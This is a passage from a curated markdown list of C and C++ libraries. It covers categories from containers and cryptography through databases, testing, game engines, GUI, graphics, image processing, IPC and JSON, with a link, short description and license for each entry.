[PGM-index](https://github.com/gvinciguerra/PGM-index) - A data structure that enables fast lookup, predecessor, range searches and updates in arrays of billions of items using orders of magnitude less space than traditional indexes. [Apache2] [website](https://pgm.di.unipi.it) * [plf::list](https://github.com/mattreecebentley/plf_list) - A std::list implementation which removes range splicing in order to enable cache-friendlier structure, yielding significant performance gains. [zLib] [website](http://www.plflib.org/list.htm) * [plf::stack](https://github.com/mattreecebentley/plf_stack) - A replacement container for the std::stack container adaptor, with better performance than any std container in a stack context. [zLib] [website](http://www.plflib.org/stack.htm) * [ring_span lite](https://github.com/martinmoene/ring-span-lite) - A simplified implementation of Arthur O'Dwyer's ring_span implementation ie. a circular buffer view. [MIT] * [robin-hood-hashing](https://github.com/martinus/robin-hood-hashing) - Fast & memory efficient hashtable based on robin hood hashing for C++14. [MIT] * [robin-map](https://github.com/Tessil/robin-map) - Fast hash map and hash set using robin hood hashing. [MIT] * [sparsepp](https://github.com/greg7mdp/sparsepp) - A fast, memory efficient hash map for C++. [BSD 3-clause] ## Cryptography *Cryptography and Encryption Libraries* * [Bcrypt](http://bcrypt.sourceforge.net/) - A cross platform file encryption utility. Encrypted files are portable across all supported operating systems and processors. [BSD] * [BeeCrypt](http://beecrypt.sourceforge.net/) - A portable and fast cryptography library. [LGPLv2.1+] * [Botan](http://botan.randombit.net/) - A crypto library for C++. [BSD-2] * [Crypto++](https://github.com/weidai11/cryptopp) - A free C++ class library of cryptographic schemes. [Boost] [website](http://www.cryptopp.com/) * [digestpp](https://github.com/kerukuro/digestpp) - C++11 header-only message digest (hash) library. [PublicDomain] * [GnuPG](https://www.gnupg.org/) - A complete and free implementation of the OpenPGP standard. [GPL] * [GnuTLS](http://www.gnutls.org/) - A secure communications library implementing the SSL, TLS and DTLS protocols. [LGPL2.1] * [Libgcrypt](http://www.gnu.org/software/libgcrypt/) - A general purpose cryptographic library originally based on code from GnuPG. [LGPLv2.1+] * [LibreSSL](http://www.libressl.org/) - A free version of the SSL/TLS protocol forked from OpenSSL in 2014. [?] * [libsodium](https://github.com/jedisct1/libsodium) - P(ortable|ackageable) NaCl-based crypto library, opinionated and easy to use. [ISC] * [libhydrogen](https://github.com/jedisct1/libhydrogen) - A lightweight, secure, easy-to-use crypto library suitable for constrained environments. [ISC] * [LibTomCrypt](https://github.com/libtom/libtomcrypt) - A fairly comprehensive, modular and portable cryptographic toolkit. [WTFPL] * [mbedTLS](https://github.com/ARMmbed/mbedtls) - An open source, portable, easy to use, readable and flexible SSL library, previously known as PolarSSL. [Apache2] [website](https://tls.mbed.org/) * [Nettle](http://www.lysator.liu.se/~nisse/nettle/) - A low-level cryptographic library. [LGPL] * [OpenSSL](https://github.com/openssl/openssl) - A robust, commercial-grade, full-featured, and Open Source cryptography library. [Apache] [website](http://www.openssl.org/) * [retter](https://github.com/MaciejCzyzewski/retter) - A collection of hash functions, ciphers, tools, libraries, and materials related to cryptography. * [s2n](https://github.com/awslabs/s2n) - An implementation of the TLS/SSL protocols. [Apache] * [sha1collisiondetection](https://github.com/cr-marcstevens/sha1collisiondetection) - Library and command line tool to detect SHA-1 collision in a file. [MIT] * [Tink](https://github.com/google/tink) - A multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse. [Apache-2.0] * [Tiny AES in C](https://github.com/kokke/tiny-AES-c) - Small portable AES128/192/256 in C. [PublicDomain] * [Themis](https://github.com/cossacklabs/themis) - crypto library for painless data security, providing symmetric and asymmetric encryption, secure sockets with forward secrecy, for mobile and server platforms. [Apache2] * [HEhub](https://github.com/primihub/HEhub) - A library for homomorphic encryption and its applications. [Apache2] ## CSV *Libraries for parsing Comma Separated Value (CSV) files* * [csv2](https://github.com/p-ranav/csv2) - Fast CSV parser for modern C++. [MIT] * [Csv::Parser](https://github.com/ashaduri/csv-parser) - Compile-time and runtime CSV parser written in C++17. [Zlib] * [Fast C++ CSV Parser](https://github.com/ben-strasser/fast-cpp-csv-parser) - Small, easy-to-use and fast header-only library for reading CSV files. [BSD-3-Clause] * [lazycsv](https://github.com/ashtum/lazycsv) - A fast, lightweight and single-header csv parser for modern C++. [MIT] * [Vince's CSV Parser](https://github.com/vincentlaucsb/csv-parser) - A fast, self-contained, streaming C++17 CSV parser with optional type-casting and statistics. [MIT] ## Database *Database Libraries, SQL Servers, ODBC Drivers, and Tools* * [ClickHouse](https://github.com/ClickHouse/clickhouse-cpp) - C++ client for ClickHouse DBMS. [Apache2] * [hiberlite](https://github.com/paulftw/hiberlite) - C++ Object-relational mapping for sqlite3. [BSD] * [Hiredis](https://github.com/redis/hiredis) - A minimalistic C client library for the Redis database. [BSD] * [Kvrocks](https://github.com/apache/incubator-kvrocks) - A distributed key value NoSQL database that uses RocksDB as storage engine and is compatible with Redis protocol. [Apache2] * [LevelDB](https://github.com/google/leveldb) - A fast key-value storage library written at Google that provides an ordered mapping from string keys to string values. [BSD] * [libpqxx](https://github.com/jtv/libpqxx) - The official C++ client API for PostgreSQL. [BSD-3-Clause] * [LMDB](https://www.symas.com/lmdb) - Very fast embedded key/value store with full ACID semantics. [OpenLDAP] * [LMDB++](https://github.com/bendiken/lmdbxx) - C++11 wrapper for the LMDB embedded database library. [PublicDomain] * [MongoDB C Driver](https://github.com/mongodb/mongo-c-driver) - MongoDB client library for C. [Apache2] * [MongoDB C++ Driver](https://github.com/mongodb/mongo-cxx-driver) - C++ driver for MongoDB. [Apache2] * [MongoDB Libbson](https://github.com/mongodb/libbson) - A BSON utility library. [Apache2] * [MySQL++](http://www.tangentsoft.net/mysql++/) - A C++ wrapper for MySQL's C API. [LGPL] * [nanodbc](https://github.com/nanodbc/nanodbc) - A small C++ wrapper for the native C ODBC API. [MIT] * [ODB](https://www.codesynthesis.com/products/odb/) - An open-source, cross-platform, and cross-database object-relational mapping (ORM) system for C++. [GPLv2] * [redis3m](https://github.com/luca3m/redis3m) - Wrapper of hiredis with clean C++ interface, supporting sentinel and ready to use patterns. [Apache2] * [RocksDB](https://github.com/facebook/rocksdb) - Embedded key-value store for fast storage from facebook. [BSD] * [SimDB](https://github.com/LiveAsynchronousVisualizedArchitecture/simdb) - High performance, shared memory, lock free, cross platform, single file, minimal dependencies, C++11 key-value store. [Apache2] * [SOCI](https://github.com/SOCI/soci) - A database abstraction layer for C++. [Boost] * [Speedb](https://github.com/speedb-io/speedb) - Community-led project: A RocksDB compliant high performance scalable embedded key-value store. [Apache2] * [SQLite](http://www.sqlite.org/) - A completely embedded, full-featured relational database in a few 100k that you can include right into your project. [PublicDomain] * [SQLiteC++](https://github.com/SRombauts/SQLiteCpp) - SQLiteC++ (SQLiteCpp) is a smart and easy to use C++ SQLite3 wrapper. [MIT] * [sqlite_modern_cpp](https://github.com/SqliteModernCpp/sqlite_modern_cpp) - Header only C++14 wrapper around sqlite library. [MIT] * [sqlite_orm](https://github.com/fnc12/sqlite_orm) - SQLite ORM light header only library for modern C++. [AGPL + paid MIT] * [sqlpp11](https://github.com/rbock/sqlpp11) - A type safe embedded domain specific language for SQL queries and results in C++. [BSD-2-Clause] * [TileDB](https://github.com/TileDB-Inc/TileDB) - Fast Dense and Sparse Multidimensional Array DBMS. [MIT] [website](https://tiledb.io/) * [UnQLite](https://github.com/symisc/unqlite) - A self-contained, serverless, zero-configuration, transactional NoSQL engine. [BSD-2-Clause] [website](https://unqlite.org/) * [upscaledb](https://upscaledb.com) - An embedded "typed" key/value store with a built-in query interface. [GPLv3] ## Data visualization *Data visiualization Libraries* * [matplotplusplus](https://github.com/alandefreitas/matplotplusplus) - C++ Graphics Library for Data Visualization. [MIT] [website](https://alandefreitas.github.io/matplotplusplus/) ## Debug *Debugging Libraries, Memory Leak and Resource Leak Detection, Unit Testing* * [backward-cpp](https://github.com/bombela/backward-cpp) - A beautiful stack trace pretty printer for C++. [MIT] * [benchmark](https://github.com/google/benchmark) - Google provided small microbenchmark support library. [Apache2] * [Boost.Test](https://github.com/boostorg/test) - Boost Test Library. [Boost] [website](https://boost.org/libs/test) * [check](https://github.com/libcheck/check) - Check is a unit testing framework for C. [LGPL-2.1] [website](https://libcheck.github.io/check/) * [doctest](https://github.com/onqtam/doctest) - The lightest feature rich C++ single header testing framework. [MIT] * [Catch2](https://github.com/catchorg/Catch2) - A modern, C++-native, test framework for unit-tests, TDD and BDD. [Boost] * [Celero](https://github.com/DigitalInBlue/Celero) - C++ Benchmarking Framework. [Apache2] * [CppUTest](https://github.com/cpputest/cpputest) - Unit testing and mocking framework for C/C++. [BSD-3-clause] * [CUTE](http://cute-test.com) - C++ Unit Testing Easier. [LGPL3] * [CMocka](https://cmocka.org/) - unit testing framework for C with support for mock objects. [Apache2] * [CppUnit](http://www.freedesktop.org/wiki/Software/cppunit/) - C++ port of JUnit. [LGPL2] * [CTest](https://cmake.org/cmake/help/v2.8.8/ctest.html) - The CMake test driver program. [BSD] * [dbg-macro](https://github.com/sharkdp/dbg-macro) - A dbg(…) macro for C++. [MIT] * [DebugViewPP](https://github.com/CobaltFusion/DebugViewPP) - Debug logging viewer. [Boost] * [Deleaker](http://www.deleaker.com) - A tool for resource leak detection, including memory, GDI and handle leaks. * [FakeIt](https://github.com/eranpeer/FakeIt) - Simple mocking framework for C++. [MIT] * [fff](https://github.com/meekrosoft/fff) - A micro-framework for creating fake C functions. [MIT] * [Google Mock](https://github.com/google/googletest/blob/master/googlemock/README.md) - A library for writing and using C++ mock classes. [BSD] * [Google Test](https://github.com/google/googletest) - Google C++ Testing Framework. [BSD] * [ig-debugheap](https://github.com/deplinenoise/ig-debugheap) - Multiplatform debug heap useful for tracking down memory errors. [BSD] * [libtap](https://github.com/zorgnax/libtap) - Write tests in C. [GPL2] * [microprofile](https://github.com/jonasmr/microprofile) - Profiler with web-view for multiple platforms. [Unlicense] * [MinUnit](https://github.com/siu/minunit) - A minimal unit testing framework for C self-contained in a single header file. [MIT] * [Mockator](http://www.mockator.com) - Eclipse CDT plug-in for C++ Seams and Mock Objects. * [nanobench](https://github.com/martinus/nanobench) - Simple, fast, accurate single-header microbenchmarking functionality for C++11/14/17/20. [MIT] [website](https://nanobench.ankerl.com) * [Nanotimer](https://github.com/mattreecebentley/plf_nanotimer) - A simple low-overhead cross-platform timer class for benchmarking. [zLib] [website](http://www.plflib.org/nanotimer.htm) * [Nonius](https://github.com/libnonius/nonius) - A C++ micro-benchmarking framework. [CC] * [Remotery](https://github.com/Celtoys/Remotery) - Single C File Profiler with Web Viewer. [Apache2] * [snitch](https://github.com/cschreib/snitch) - Lightweight C++20 testing framework. [Boost] * [Touca](https://github.com/trytouca/trytouca) - Open-source regression testing system that you can self-host. [Apache2] [website](https://touca.io/) * [UnitTest++](https://github.com/unittest-cpp/unittest-cpp) - A lightweight unit testing framework for C++. [MIT/X Consortium license] * [Unity](https://github.com/ThrowTheSwitch/Unity) - Simple Unit Testing for C. [MIT] * [utest.h](https://github.com/sheredom/utest.h) - Single header unit testing framework for C and C++. [Unlicense] * [μt](https://github.com/boost-experimental/ut) - C++20 single header/single module, macro-free μ(micro)/Unit Testing Framework. [Boost] * [VLD](https://kinddragon.github.io/vld//) - Visual Leak Detector. A free, robust, open-source memory leak detection system for Visual C++. ## Documentation * [Doxide](https://github.com/lawmurray/doxide) - Modern documentation for modern C++, configure with YAML, output Markdown. [Apache 2.0] [website](https://doxide.org) * [doxygen](https://github.com/doxygen/doxygen) :zap: - The de facto standard tool for generating documentation from annotated C++ sources. [GPL2] [website](https://www.doxygen.org) * [doxyrest](https://github.com/vovkos/doxyrest) - A compiler from Doxygen XML to reStructuredText for Sphinx. [MIT] * [hdoc](https://github.com/hdoc/hdoc) - The modern documentation tool for C++. [AGPL/Commercial] [website](https://hdoc.io) * [Natural Docs](https://github.com/NaturalDocs/NaturalDocs) - Natural Docs is an open source documentation generator for multiple programming languages. [AGPL/Commercial] [website](https://www.naturaldocs.org) * [Sphinx](https://github.com/sphinx-doc/sphinx) - Sphinx makes it easy to create intelligent and beautiful documentation. [BSD-2-Clause] [website](https://www.sphinx-doc.org) ## DSP *Digital signal processing.* * [DSPFilters](https://github.com/vinniefalco/DSPFilters) - A collection of useful C++ classes for digital signal processing. [MIT] * [FFTW](http://www.fftw.org/) - A C library for computing the DFT in one or more dimensions. [GPL] * [iir1](https://github.com/berndporr/iir1) - IIR Realtime C++ filter library. [MIT] * [kissfft](https://github.com/mborgerding/kissfft) - A Fast Fourier Transform (FFT) library that tries to Keep it Simple, Stupid. [BSD-3-Clause] * [pocketfft](https://github.com/mreineck/pocketfft) - FFT implementation based on FFTPack, but with several improvements. [BSD-3-Clause] * [wavelib](https://github.com/rafat/wavelib) - C implementation of 1D and 2D wavelet transforms. [BSD-3-Clause] ## Font *Libraries for parsing and manipulating font files.* * [Fontconfig](https://gitlab.freedesktop.org/fontconfig/fontconfig) - Font configuration and customization library. [MIT] [website](https://www.freedesktop.org/wiki/Software/fontconfig/) * [FreeType](https://www.freetype.org/) - FreeType is a freely available software library to render fonts. [FTL & GPLv2] * [otfcc](https://github.com/caryll/otfcc) - A C library and utility used for parsing and writing OpenType font files. [Apache-2.0] * [harfbuzz](https://github.com/harfbuzz/harfbuzz) - A text shaping engine. [Old MIT] ## Game Engine * [Acid](https://github.com/Equilibrium-Games/Acid) - A high speed C++17 Vulkan game engine. [MIT] * [Allegro](http://liballeg.org/) - A cross-platform library mainly aimed for video games and multimedia programming. [zlib] * [Cocos2d-x](http://www.cocos2d-x.org/) - A multi-platform framework for building 2d games, interactive books, demos and other graphical applications. [MIT] * [Corange](https://github.com/orangeduck/Corange) - A game engine written in pure C, SDL and OpenGL. [BSD] * [crown](https://github.com/dbartolini/crown) - Crown is a general purpose data-driven game engine, written from scratch in orthodox C++ with a minimalistic and data-oriented design philosophy in mind. [MIT] * [delta3d](http://sourceforge.net/projects/delta3d/) - A robust simulation platform. [LGPL2] * [EnTT](https://github.com/skypjack/entt) - Gaming meets modern C++. [MIT] * [GamePlay](https://github.com/gameplay3d/GamePlay) - A cross-platform native C++ game framework for creating 2D/3D mobile and desktop games. [Apache2] * [Godot](https://github.com/godotengine/godot) - A fully featured, open source, MIT licensed, game engine. [MIT] * [Grit](https://github.com/grit-engine/grit-engine) - Community project to build a free game engine for implementing open world 3D games. [MIT] * [Halley](https://github.com/amzeratul/halley) - A lightweight game engine written in C++14 with a "true" entity-component system. [Apache 2.0] * [KlayGE](https://github.com/gongminmin/KlayGE) - a cross-platform open source game engine with plugin-based architecture. [GPLv2] [website](http://www.klayge.org/) * [nCine](https://github.com/nCine/nCine) - A cross-platform 2D game engine with an emphasis on performance, written in C++11 and optionally scriptable in Lua. [MIT] [website](https://ncine.github.io/) * [o3de](https://github.com/o3de/o3de) - An open-source, real-time, multi-platform 3D engine based on Amazon Lumberyard. [Apache2] [website](https://o3de.org/) * [OpenXRay](https://github.com/OpenXRay/xray-16) - a community-modified X-Ray engine used in S.T.A.L.K.E.R. game series. [Modified BSD/non-commercial only] * [Oxygine](http://oxygine.org/) - A cross-platform 2D C++ game engine. [MIT] * [Panda3D](https://github.com/panda3d/panda3d) - A game engine, a framework for 3D rendering and game development for Python and C++ programs. [Modified BSD] [website](https://www.panda3d.org/) * [PixelGameEngine](https://github.com/OneLoneCoder/olcPixelGameEngine) - The official distribution of olcPixelGameEngine, a tool used in javidx9's YouTube videos and projects. [OLC3] * [Polycode](https://github.com/ivansafrin/Polycode) - A cross-platform framework for creative code in C++ (with Lua bindings). [MIT] [website](http://polycode.org/) * [quakeforge](https://github.com/quakeforge/quakeforge) - Actively maintained branch of the original Quake engine code with 20+ years of development. [GPL-2.0] * [raylib](https://github.com/raysan5/raylib) - A simple and easy-to-use library to enjoy videogames programming. [zlib/libpng] [website](http://www.raylib.com/) * [Spring](https://github.com/spring/spring) - A powerful free cross-platform RTS game engine. [GPLv2/GPLv3] [website](https://springrts.com/) * [Torque2D](https://github.com/TorqueGameEngines/Torque2D) - An open-source and cross-platform C++ engine built for 2D game development. [MIT] [website](https://torque3d.org/torque2d) * [Torque3D](https://github.com/TorqueGameEngines/Torque3D) - An open-source C++ engine built for 3D game development. [MIT] [website](https://torque3d.org/torque3d) * [toy engine](https://github.com/hugoam/toy) - toy is a thin and modular c++ game engine and offers simple expressive c++ idioms to design full featured 2D or 3D games in fast iterations. * [Urho3D](https://urho3d.github.io/) - A free lightweight, cross-platform 2D and 3D game engine implemented in C++. Greatly inspired by OGRE and Horde3D. [MIT] * [ezEngine](https://github.com/ezEngine/ezEngine) - Is a free, open-source game engine written in C++. Its philosophy is to be modular and flexible, such that it can be adapted to many different use cases. [MIT] [website](https://ezengine.net/) ## Graph * [CXXGraph](https://github.com/ZigRazor/CXXGraph) - free C++(17) graph header-only library for representation and algorithms execution. [AGPL-3.0] * [Graaf](https://github.com/bobluppes/graaf) - A general-purpose lightweight C++20 graph library. [MIT] [website](https://bobluppes.github.io/graaf/) ## GUI *Graphic User Interface* * [Boden](https://github.com/AshampooSystems/boden) - Native, mobile, cross-platform GUI Framework. [GPL/LGPL/Commercial] [website](https://www.boden.io) * [CEGUI](http://cegui.org.uk/) - Flexible, cross-platform GUI library. * [Elements](https://github.com/cycfi/elements) - Lightweight, fine-grained, resolution independent, modular GUI library. [MIT] * [FLTK](http://www.fltk.org/index.php) - Fast, light, cross-platform C++ GUI toolkit. [GPL2] * [GacUI](https://github.com/vczh-libraries/GacUI) - GPU Accelerated C++ User Interface, with WYSIWYG developing tools, XML supports, built-in data binding and MVVM features. [Ms-PL] * [GTK+](http://www.gtk.org/) - A multi-platform toolkit for creating graphical user interfaces. [LGPL] * [gtkmm](http://www.gtkmm.org/en/) - The official C++ interface for the popular GUI library GTK+. [LGPL] * [imgui](https://github.com/ocornut/imgui) - Immediate Mode Graphical User Interface with minimal dependencies. [MIT] * [implot](https://github.com/epezent/implot) - Immediate Mode Plotting widgets for imgui. [MIT] * [iup](https://www.tecgraf.puc-rio.br/iup) - Multi-platform toolkit for building graphical user interfaces. [MIT] * [libui](https://github.com/andlabs/libui) - Simple and portable (but not inflexible) GUI library in C that uses the native GUI technologies of each platform it supports. [MIT] * [MyGUI](https://github.com/MyGUI/mygui) - Fast, flexible and simple GUI. [MIT] * [nana](http://nanapro.org/en-us/) - Nana is a cross-platform library for GUI programming in modern C++ style. [Boost] * [NanoGui](https://github.com/mitsuba-renderer/nanogui) - A minimalistic cross-platform widget library for OpenGL 3.x or higher. [BSD] * [nuklear](https://github.com/Immediate-Mode-UI/Nuklear) - A single-header ANSI C gui library. [PublicDomain] * [QCustomPlot](http://qcustomplot.com/) - Qt plotting widget without further dependencies. [GPLv3] * [Qwt](http://qwt.sourceforge.net/) - Qt Widgets for Technical Applications. [Own based on LGPL] * [QwtPlot3D](http://qwtplot3d.sourceforge.net/) - A feature-rich Qt/OpenGL-based C++ programming library, providing essentially a bunch of 3D-widgets. [zlib] * [RmlUi](https://github.com/mikke89/RmlUi) - The HTML/CSS User Interface library evolved. Fork of libRocket. [MIT] * [Sciter](http://sciter.com/) - Sciter is an embeddable HTML/CSS/scripting engine aimed to be used as an UI layer of modern desktop applications. [Free/Commercial] * [Slint](https://github.com/slint-ui/slint) - Lightweight GUI toolkit for desktop and embedded. [GPL/Free/Commercial] [website](https://slint-ui.com) * [wxWidgets](http://wxwidgets.org/) - A C++ library that lets developers create applications for Windows, Mac OS X, Linux and other platforms with a single code base. [Own LGPL] * [xtd](https://github.com/gammasoft71/xtd) - Modern C++17/20 framework to create console (CLI), forms (GUI like WinForms) and tunit (unit tests like Microsoft Unit Testing Framework) applications on Windows, macOS, Linux, iOS and android. [MIT] * [Yue](https://github.com/yue/yue) - A library for creating native cross-platform GUI apps. [LGPLv2] ## Graphics * [assimp](https://github.com/assimp/assimp) - Open Asset Import Library (assimp) is a cross-platform 3D model import library which aims to provide a common API for different 3D asset file formats. [BSD-3-Clause] [website](http://www.assimp.org) * [bgfx](https://github.com/bkaradzic/bgfx) - A cross-platform rendering library. [BSD] * [Blend2D](https://github.com/blend2d/blend2d) - 2D vector graphics engine powered by a JIT compiler. [Zlib] [website](https://blend2d.com/) * [bs::framework](https://github.com/GameFoundry/bsf) - Modern C++14 library for the development of real-time graphical applications. [MIT] * [Cairo](http://www.cairographics.org/) - A 2D graphics library with support for multiple output devices. [LGPL2 or Mozilla MPL] * [C-Turtle](https://github.com/walkerje/C-Turtle) - A C++11 header-only turtle graphics library acting as a CImg wrapper. [MIT] * [Diligent Engine](https://github.com/DiligentGraphics/DiligentEngine) - A modern cross-platform low-level 3D graphics library. [Apache2] * [DirectXTK](https://github.com/Microsoft/DirectXTK) - A collection of helper classes for writing DirectX 11.x code in C++. [MIT] * [GLFW](https://github.com/glfw/glfw) - A simple, cross-platform OpenGL wrangling library. [zlib/libpng] * [GLFWPP](https://github.com/janekb04/glfwpp) - A thin modern C++17 header-only wrapper for GLFW. [MIT] * [Harfang 3D](https://github.com/harfang3d/harfang3d) 3D visualization library usable in C++, Python, Lua and Go. Based on BGFX. [GPLv3/LGPLv3/Commercial] [website](https://www.harfang3d.com) * [herebedragons](https://github.com/kosua20/herebedragons) - A basic 3D scene implemented with various engines, frameworks or APIs. [MIT] [website](http://simonrodriguez.fr/dragon/) * [Horde3D](https://github.com/horde3d/Horde3D) - A small 3D rendering and animation engine. [EPL] * [Ion](https://github.com/google/ion) - A small and efficient set of libraries for building cross-platform client or server applications that use 3D graphics. [Apache2] [website](https://google.github.io/ion/) * [Irrlicht](http://irrlicht.sourceforge.net/) - A high performance realtime 3D engine written in C++. [zlib] * [libigl](https://github.com/libigl/libigl) - Simple C++ geometry processing library. [MPL2] * [LLGL](https://github.com/LukasBanana/LLGL) - Low Level Graphics Library (LLGL) is a thin abstraction layer for the modern graphics APIs. [BSD-3-Clause] * [magnum](https://github.com/mosra/magnum) - Lightweight and modular C++11/C++14 graphics middleware for games and data visualization. [MIT] [website](http://magnum.graphics) * [NanoVG](https://github.com/memononen/nanovg) - Antialiased 2D vector drawing library on top of OpenGL for UI and visualizations. [Zlib] * [Ogre 3D](https://github.com/OGRECave) :zap: - A scene-oriented, real-time, flexible 3D rendering engine (as opposed to a game engine) written in C++. [MIT] [website](https://www.ogre3d.org) * [OpenSceneGraph](http://www.openscenegraph.org/) - An open source high performance 3D graphics toolkit. [OSGPL] * [OpenSubdiv](https://github.com/PixarAnimationStudios/OpenSubdiv) - Pixar's library for evaluating and rendering subdivision surfaces on CPU and GPU. [Modified Apache2] * [OpenVDB](http://www.openvdb.org/) - Library and tools for storing, editing, and rendering volumetric datasets. [MPL2] * [Panda3D](http://www.panda3d.org/) - A framework for 3D rendering and game development for Python and C++. [BSD] * [Partio](https://github.com/wdas/partio) - Library for wrangling particle data, with support for most common file formats. [Modified BSD] * [Skia](https://github.com/google/skia) - A complete 2D graphic library for drawing Text, Geometries, and Images. [BSD] [website](https://skia.org/) * [TinySpline](https://github.com/msteinbeck/tinyspline) - A small, yet powerful ANSI C library for interpolating, transforming, and querying arbitrary NURBS, B-Splines, and Bézier curves. [MIT] * [urho3d](https://github.com/urho3d/Urho3D) - Cross-platform rendering and game engine. [Many different, mostly MIT] * [Yocto/GL](https://github.com/xelatihy/yocto-gl) - Tiny C++ Libraries for Data-Driven Physically-based Graphics. [MIT] ## Image Processing * [Boost.GIL](https://github.com/boostorg/gil) - Generic Image Library. [Boost] [website](https://boost.org/libs/gil) * [BitmapPlusPLus](https://github.com/baderouaich/BitmapPlusPlus) - Simple and Fast header only Bitmap C++ library. [MIT] * [CImg](http://cimg.eu/) - A small, open source, C++ toolkit for image processing. [Own LGPL or GPL] * [CxImage](https://www.codeproject.com/Articles/1300/CxImage) - An image processing and conversion library to load, save, display, transform BMP, JPEG, GIF, PNG, TIFF, MNG, ICO, PCX, TGA, WMF, WBMP, JBG, J2K images. [zlib] * [Dlib](https://github.com/davisking/dlib) :zap: - A modern C++11 machine learning, computer vision, numerical optimization, and deep learning toolkit. [Boost] [website](http://dlib.net/) * [FreeImage](http://freeimage.sourceforge.net/) - An open source library that supports popular graphics image formats and others as needed by today's multimedia applications. [GPL2 or GPL3] * [GD](https://github.com/libgd/libgd) - GD Graphics Library, famously used in PHP for image loading/manipulation & thumbnail generation. [custom permissive license, requires mention in user docs] [website](http://libgd.github.io/) * [DCMTK](http://dicom.offis.de/dcmtk.php.en) - DICOM Toolkit. * [GDCM](http://gdcm.sourceforge.net/wiki/index.php/Main_Page) - Grassroots DICOM library. * [ITK](http://www.itk.org/) - An open-source, cross-platform system for image analysis. [Apache2 from ITK 4.0] * [Leptonica](https://github.com/DanBloomberg/leptonica) - Leptonica is an open source library containing software that is broadly useful for image processing and image analysis applications. [BSD-2-Clause] [website](http://leptonica.org/index.html) * [libfacedetection](https://github.com/ShiqiYu/libfacedetection) - Open source library for face detection in images. The face detection speed can reach 1500FPS. [BSD] * [libjpeg-turbo](https://github.com/libjpeg-turbo/libjpeg-turbo) - A JPEG image codec that uses SIMD instructions to accelerate baseline JPEG encoding and decoding. [IJG & BSD-3-Clause & zlib] [website](https://libjpeg-turbo.org/) * [libvips](https://github.com/jcupitt/libvips) - A fast image processing library with low memory needs. [LGPL] [website](http://www.vips.ecs.soton.ac.uk/) * [Magick++](https://imagemagick.org/script/magick++.php) - ImageMagick program interfaces for C++. [Apache2] * [MagickWnd](https://imagemagick.org/script/magick-wand.php) - ImageMagick program interfaces for C. [Apache2] * [OpenCV](https://github.com/opencv) :zap: - Open source computer vision. [Apache2] [website](https://opencv.org) * [OpenEXR](http://www.openexr.com/) - Cross-platform library for high dynamic range imaging. [Modified BSDF] * [OpenImageIO](https://github.com/OpenImageIO/oiio) - Powerful image and texture wrangling library with support for a wide number of common lossy and RAW formats. [Modified BSD] * [SAIL](https://github.com/happy-sea-fox/sail) - Easy-to-use cross-platform image decoding library with pluggable image codecs. [MIT] * [Simd](https://github.com/ermig1979/Simd) - C++ image processing library with using of SIMD: SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2, AVX, AVX2, AVX-512, VMX(Altivec) and VSX(Power7), NEON for ARM. [MIT] * [stb-image](https://github.com/nothings/stb/blob/master/stb_image.h) - STB single-header image loading library. [Public Domain] * [tesseract-ocr](https://github.com/tesseract-ocr) - An OCR engine. [Apache2] * [TinyEXIF](https://github.com/cdcseacave/TinyEXIF) - Tiny ISO-compliant C++ EXIF and XMP parsing library for JPEG. [MIT] * [Video++](https://github.com/matt-42/vpp) - A C++14 high performance video and image processing library. [MIT] * [VIGRA](https://github.com/ukoethe/vigra) - A generic C++ computer vision library for image analysis. [MIT X11] * [VTK](http://www.vtk.org/) - Open-source, freely available software system for 3D computer graphics, image processing and visualization. [BSD] ## Internationalization * [gettext](http://www.gnu.org/software/gettext/) - GNU 'gettext'. [GPL2] * [IBM ICU](http://site.icu-project.org/) - A set of C/C++ and Java libraries providing Unicode and Globalization support. [ICU] * [libiconv](http://www.gnu.org/software/libiconv/) - An encoding conversion library between different character encodings. [GPL] * [uni-algo](https://github.com/uni-algo/uni-algo) - Unicode Algorithms Implementation for C/C++. [Unlicense or MIT] * [utf8.h](https://github.com/sheredom/utf8.h) - Single header utf8 string functions for C and C++. [Unlicense] * [utf8proc](https://github.com/JuliaStrings/utf8proc) - A clean C library for processing UTF-8 Unicode data. [MIT] ## Inter-process communication * [Apache Thrift](https://thrift.apache.org/) - Efficient cross-language IPC/RPC, works between C++, Java, Python, PHP, C#, and many more other languages. Originally developed by Facebook. [Apache2] * [Boost.Interprocess](https://github.com/boostorg/interprocess) - Header-only Boost library that supports kernel-level shared memory and memory-mapped files, with in-built synchronization mechanisms (semaphores, mutexes, and more). [Boost] [website](https://boost.org/libs/interprocess) * [Cap'n Proto](https://github.com/capnproto/capnproto) - Fast data interchange format and capability-based RPC system. [MIT] [website](https://capnproto.org/) * [eCAL](https://github.com/continental/ecal) - Pub/sub, client/server, C++/Python/C#, various message protocols (protobuf, capnproto ..). [Apache2] [website](http://www.ecal.io/) * [gRPC](https://github.com/grpc/grpc) - A high performance, open source, general-purpose RPC framework. [BSD] [website](http://www.grpc.io/) * [Ice](https://github.com/zeroc-ice/ice) - Comprehensive RPC framework with support for C++, C#, Java, JavaScript, Python and more. [GPLv2] * [iceoryx](https://github.com/eclipse-iceoryx/iceoryx) - True zero-copy inter-process communication framework for safety critical systems with bindings for C, Rust. Runs on Linux, QNX, Windows, Mac OS, FreeBSD. [Apache2] [website](https://iceoryx.io/) * [libjson-rpc-cpp](https://github.com/cinemast/libjson-rpc-cpp) - JSON-RPC framework for C++ servers and clients. [MIT] * [nanomsg](https://github.com/nanomsg/nanomsg) - A simple high-performance implementation of several "scalability protocols". [MIT] [website](http://nanomsg.org/) * [nng](https://github.com/nanomsg/nng) - nanomsg-next-generation, a light-weight brokerless messaging library. [MIT] [website](https://nanomsg.github.io/nng/) * [rpclib](https://github.com/rpclib/rpclib) - A modern C++ msgpack-RPC server and client library. [MIT] * [simple-rpc-cpp](https://github.com/pearu/simple-rpc-cpp) - A simple RPC wrapper generator to C/C++ functions. [BSD] * [SRPC](https://github.com/sogou/srpc) - A lightweight RPC system that supports multiple protocols and OpenTelemetry. [Apache2] * [WAMP](http://wamp.ws/) - Provides RPC and pub/sub messaging patterns. (various implementations, various languages) * [xmlrpc-c](http://xmlrpc-c.sourceforge.net/) - A lightweight RPC library based on XML and HTTP. [BSD] ## JSON * [Boost.PropertyTree](https://github.com/boostorg/property_tree) - A property tree parser/generator that can be used to parse XML/JSON/INI/Info files. [Boost] [website](https://boost.org/libs/property_tree) * [cJSON](https://github.com/DaveGamble/cJSON) - Ultralightweight JSON parser in ANSI C. [MIT] * [frozen](https://github.com/cesanta/frozen) - JSON parser and generator for C/C++. [GPL & GPL2] * [Glaze](https://github.com/stephenberry/glaze) - Extremely fast, in memory, JSON and interface library for modern C++. [MIT] 